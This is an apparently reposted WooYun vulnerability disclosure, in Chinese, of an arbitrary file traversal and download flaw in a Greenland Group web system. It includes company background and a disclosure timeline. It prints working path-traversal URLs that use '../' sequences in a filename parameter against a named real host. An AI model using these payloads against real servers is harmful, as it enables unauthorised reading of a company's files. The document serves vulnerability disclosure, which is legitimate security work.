神刀安全网

漏洞标题: 绿地集团某重要系统任意文件遍历和下载

漏洞详情

披露状态:

2016-01-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://www.ldjt.com.cn
绿地控股股份有限公司(上市公司简称:绿地控股,上市公司代码:600606)是一家由上海市国有资产监督管理委员会监管的特大型混合所有制企业,创立于1992年7月18日,总部设立于中国上海。

成立23年来,绿地已在全球范围内形成了“以房地产开发为主业,大基建、大金融、大消费等新兴产业并举发展”的多元格局,坚定实施资本化、公众化、国际化发展战略,旗下企业及项目遍及北京、上海、广州等80多个中国城市以及美国、英国、德国、澳大利亚、加拿大、韩国、泰国、马来西亚等海外九国十二城,实现了国内A股整体上市(600606.SH)及部分资产香港H股上市(00337.HK 01365.HK),构筑起境内外资源整合的资本平台,位列2015年《财富》世界企业500强第258位。

详细说明:

漏洞系统:

http://iufo.ldjt.com.cn

漏洞标题:  绿地集团某重要系统任意文件遍历和下载

code 区域
http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../

漏洞标题:  绿地集团某重要系统任意文件遍历和下载

code 区域
http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../IBM/WebSphere/AppServer/web/mbeanDocs

漏洞标题:  绿地集团某重要系统任意文件遍历和下载

漏洞证明:

如上

修复方案:

……

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 绿地集团某重要系统任意文件遍历和下载

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮